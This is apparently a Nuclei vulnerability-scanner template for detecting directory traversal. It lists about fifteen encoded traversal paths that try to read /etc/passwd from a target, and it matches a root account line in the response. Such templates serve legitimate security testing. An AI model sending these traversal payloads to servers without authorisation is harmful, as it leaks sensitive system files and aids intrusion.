id: directory-traversal info: name: Generic Directory Traversal author: pentest_swissky severity: high description: Detect basic directory traversal leading to a leak of sensitive files. requests: - method: GET path: - "{{BaseURL}}/..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/./../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body